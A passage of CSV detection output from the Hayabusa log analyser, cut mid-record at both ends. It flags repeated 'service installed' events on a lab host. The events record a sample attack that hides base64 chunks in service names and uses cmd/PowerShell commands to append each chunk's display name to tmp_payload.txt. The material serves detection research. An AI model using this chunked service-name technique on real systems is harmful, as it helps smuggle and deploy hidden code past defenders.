start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:37.081 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICB9DQp9DQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg140"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:37.081 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICB9DQp9DQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg140"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:38.534 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KI0Z1bmN0aW9uIHdpbGwgZ2VuZXJhdGUgb3V0cHV0IGluZm8gZm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg141"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:38.534 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KI0Z1bmN0aW9uIHdpbGwgZ2VuZXJhdGUgb3V0cHV0IGluZm8gZm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg141"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:38.534 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KI0Z1bmN0aW9uIHdpbGwgZ2VuZXJhdGUgb3V0cHV0IGluZm8gZm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg141"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:39.987 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 9yIHRoZSBnaXZlbiBsb2cuIEF2ZywgU3VnZ2VzdGVkIFByb2ZpbGUsIGV0Yy4uLg0KDQojQHBhcmFtICRMb2dOYW1lICAgICAgICAgICAgLT4gIFRoZSBFdmVudCBMb2cNCiNAcGFyYW0gJEF2Z0V2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg142"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:39.987 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 9yIHRoZSBnaXZlbiBsb2cuIEF2ZywgU3VnZ2VzdGVkIFByb2ZpbGUsIGV0Yy4uLg0KDQojQHBhcmFtICRMb2dOYW1lICAgICAgICAgICAgLT4gIFRoZSBFdmVudCBMb2cNCiNAcGFyYW0gJEF2Z0V2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg142"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:39.987 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 9yIHRoZSBnaXZlbiBsb2cuIEF2ZywgU3VnZ2VzdGVkIFByb2ZpbGUsIGV0Yy4uLg0KDQojQHBhcmFtICRMb2dOYW1lICAgICAgICAgICAgLT4gIFRoZSBFdmVudCBMb2cNCiNAcGFyYW0gJEF2Z0V2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg142"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:41.440 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ZW50c1BlclNlY29uZCAtPiAgVGhlIGF2ZyBldmVudHMgcGVyIHNlY29uZCBmb3IgdGhlIGdpdmVuIGxvZw0KI0BwYXJhbSAkVG90YWxMb2dFdmVudHMgICAgIC0+ICBUaGUgdG90YWwgIyBvZiBldm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg143"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:41.440 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZW50c1BlclNlY29uZCAtPiAgVGhlIGF2ZyBldmVudHMgcGVyIHNlY29uZCBmb3IgdGhlIGdpdmVuIGxvZw0KI0BwYXJhbSAkVG90YWxMb2dFdmVudHMgICAgIC0+ICBUaGUgdG90YWwgIyBvZiBldm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg143"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:41.440 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZW50c1BlclNlY29uZCAtPiAgVGhlIGF2ZyBldmVudHMgcGVyIHNlY29uZCBmb3IgdGhlIGdpdmVuIGxvZw0KI0BwYXJhbSAkVG90YWxMb2dFdmVudHMgICAgIC0+ICBUaGUgdG90YWwgIyBvZiBldm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg143"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:42.889 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: VudHMgZm9yIHRoZSBnaXZlbiBsb2cNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg144"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:42.889 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: VudHMgZm9yIHRoZSBnaXZlbiBsb2cNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg144"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:42.889 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: VudHMgZm9yIHRoZSBnaXZlbiBsb2cNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg144"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:44.332 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBFeHBvcnQtTG9nUmVwb3J0IHsgcGFyYW0oJENvbXB1dGVybGlzdCwgJENvbXB1dGVyQ291bnQsICRDb21wdXRlckxpc3RUeXBlKSAgICANCg0KICAgIHRyeS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg145"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:44.332 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBFeHBvcnQtTG9nUmVwb3J0IHsgcGFyYW0oJENvbXB1dGVybGlzdCwgJENvbXB1dGVyQ291bnQsICRDb21wdXRlckxpc3RUeXBlKSAgICANCg0KICAgIHRyeS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg145"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:44.332 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBFeHBvcnQtTG9nUmVwb3J0IHsgcGFyYW0oJENvbXB1dGVybGlzdCwgJENvbXB1dGVyQ291bnQsICRDb21wdXRlckxpc3RUeXBlKSAgICANCg0KICAgIHRyeS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg145"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:45.778 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: B7DQogICAgICAgIA0KICAgICAgICAkUmVwb3J0ID0gQ3JlYXRlLUxvZ1JlcG9ydCAkQ29tcHV0ZXJsaXN0ICRDb21wdXRlckNvdW50ICRDb21wdXRlckxpc3RUeXBlDQoNCiAgICAgICAgJE91dHB1 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg146"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:45.778 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: B7DQogICAgICAgIA0KICAgICAgICAkUmVwb3J0ID0gQ3JlYXRlLUxvZ1JlcG9ydCAkQ29tcHV0ZXJsaXN0ICRDb21wdXRlckNvdW50ICRDb21wdXRlckxpc3RUeXBlDQoNCiAgICAgICAgJE91dHB1 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg146"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:45.778 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: B7DQogICAgICAgIA0KICAgICAgICAkUmVwb3J0ID0gQ3JlYXRlLUxvZ1JlcG9ydCAkQ29tcHV0ZXJsaXN0ICRDb21wdXRlckNvdW50ICRDb21wdXRlckxpc3RUeXBlDQoNCiAgICAgICAgJE91dHB1 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg146"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:47.225 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: dFRhYmxlID0gZm9yZWFjaCAoJGJveCBpbiAkUmVwb3J0LkdldEVudW1lcmF0b3IoKSkgeyANCg0KICAgICAgICAgICAgTmV3LU9iamVjdCBQU09iamVjdCAtUHJvcGVydHkgKFtvcmRlcmVkXUB7DQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg147"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:47.225 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dFRhYmxlID0gZm9yZWFjaCAoJGJveCBpbiAkUmVwb3J0LkdldEVudW1lcmF0b3IoKSkgeyANCg0KICAgICAgICAgICAgTmV3LU9iamVjdCBQU09iamVjdCAtUHJvcGVydHkgKFtvcmRlcmVkXUB7DQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg147"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:47.225 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dFRhYmxlID0gZm9yZWFjaCAoJGJveCBpbiAkUmVwb3J0LkdldEVudW1lcmF0b3IoKSkgeyANCg0KICAgICAgICAgICAgTmV3LU9iamVjdCBQU09iamVjdCAtUHJvcGVydHkgKFtvcmRlcmVkXUB7DQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg147"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:48.663 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ogICAgICAgICAgICAiU2VydmVyIiA9ICRib3guTmFtZTsgIk9TIFZlcnNpb24iID0gJGJveC5WYWx1ZS5PU1ZlcnNpb247IA0KICAgICAgICAgICAgIkFwcGxpY2F0aW9uIChFUFMpIiA9ICRib3gu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg148"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:48.663 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ogICAgICAgICAgICAiU2VydmVyIiA9ICRib3guTmFtZTsgIk9TIFZlcnNpb24iID0gJGJveC5WYWx1ZS5PU1ZlcnNpb247IA0KICAgICAgICAgICAgIkFwcGxpY2F0aW9uIChFUFMpIiA9ICRib3gu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg148"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:48.663 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ogICAgICAgICAgICAiU2VydmVyIiA9ICRib3guTmFtZTsgIk9TIFZlcnNpb24iID0gJGJveC5WYWx1ZS5PU1ZlcnNpb247IA0KICAgICAgICAgICAgIkFwcGxpY2F0aW9uIChFUFMpIiA9ICRib3gu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg148"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:50.135 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: VmFsdWUuQXBwbGljYXRpb25FUFM7ICJBcHBsaWNhdGlvbiAxc3QgRXZlbnQiID0gJGJveC5WYWx1ZS5BcHBsaWNhdGlvbkZpcnN0RXZlbnRUaW1lOyAiQXBwbGljYXRpb24gbGFzdCBFdmVudCIgPS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg149"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:50.135 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: VmFsdWUuQXBwbGljYXRpb25FUFM7ICJBcHBsaWNhdGlvbiAxc3QgRXZlbnQiID0gJGJveC5WYWx1ZS5BcHBsaWNhdGlvbkZpcnN0RXZlbnRUaW1lOyAiQXBwbGljYXRpb24gbGFzdCBFdmVudCIgPS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg149"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:50.135 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: VmFsdWUuQXBwbGljYXRpb25FUFM7ICJBcHBsaWNhdGlvbiAxc3QgRXZlbnQiID0gJGJveC5WYWx1ZS5BcHBsaWNhdGlvbkZpcnN0RXZlbnRUaW1lOyAiQXBwbGljYXRpb24gbGFzdCBFdmVudCIgPS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg149"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:51.588 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AkYm94LlZhbHVlLkFwcGxpY2F0aW9uTGFzdEV2ZW50VGltZTsgIkFwcGxpY2F0aW9uIHRvdGFsIGV2ZW50cyIgPSAkYm94LlZhbHVlLkFwcGxpY2F0aW9uVG90YWxFdmVudHM7ICJBcHBsaWNhdGlv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg150"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:51.588 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AkYm94LlZhbHVlLkFwcGxpY2F0aW9uTGFzdEV2ZW50VGltZTsgIkFwcGxpY2F0aW9uIHRvdGFsIGV2ZW50cyIgPSAkYm94LlZhbHVlLkFwcGxpY2F0aW9uVG90YWxFdmVudHM7ICJBcHBsaWNhdGlv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg150"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:51.588 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AkYm94LlZhbHVlLkFwcGxpY2F0aW9uTGFzdEV2ZW50VGltZTsgIkFwcGxpY2F0aW9uIHRvdGFsIGV2ZW50cyIgPSAkYm94LlZhbHVlLkFwcGxpY2F0aW9uVG90YWxFdmVudHM7ICJBcHBsaWNhdGlv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg150"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:53.026 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: biBMb2cgU2l6ZSAoTUIpIiA9ICRib3guVmFsdWUuQXBwbGljYXRpb25FdmVudExvZ1NpemU7DQogICAgICAgICAgICAiU2VjdXJpdHkgKEVQUykiID0gJGJveC5WYWx1ZS5TZWN1cml0eUVQUzsgIl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg151"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:53.026 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: biBMb2cgU2l6ZSAoTUIpIiA9ICRib3guVmFsdWUuQXBwbGljYXRpb25FdmVudExvZ1NpemU7DQogICAgICAgICAgICAiU2VjdXJpdHkgKEVQUykiID0gJGJveC5WYWx1ZS5TZWN1cml0eUVQUzsgIl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg151"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:53.026 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: biBMb2cgU2l6ZSAoTUIpIiA9ICRib3guVmFsdWUuQXBwbGljYXRpb25FdmVudExvZ1NpemU7DQogICAgICAgICAgICAiU2VjdXJpdHkgKEVQUykiID0gJGJveC5WYWx1ZS5TZWN1cml0eUVQUzsgIl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg151"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:54.457 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: NlY3VyaXR5IDFzdCBFdmVudCIgPSAkYm94LlZhbHVlLlNlY3VyaXR5Rmlyc3RFdmVudFRpbWU7ICJTZWN1cml0eSBsYXN0IEV2ZW50IiA9ICRib3guVmFsdWUuU2VjdXJpdHlMYXN0RXZlbnRUaW1l | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg152"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:54.457 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: NlY3VyaXR5IDFzdCBFdmVudCIgPSAkYm94LlZhbHVlLlNlY3VyaXR5Rmlyc3RFdmVudFRpbWU7ICJTZWN1cml0eSBsYXN0IEV2ZW50IiA9ICRib3guVmFsdWUuU2VjdXJpdHlMYXN0RXZlbnRUaW1l | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg152"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:54.457 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 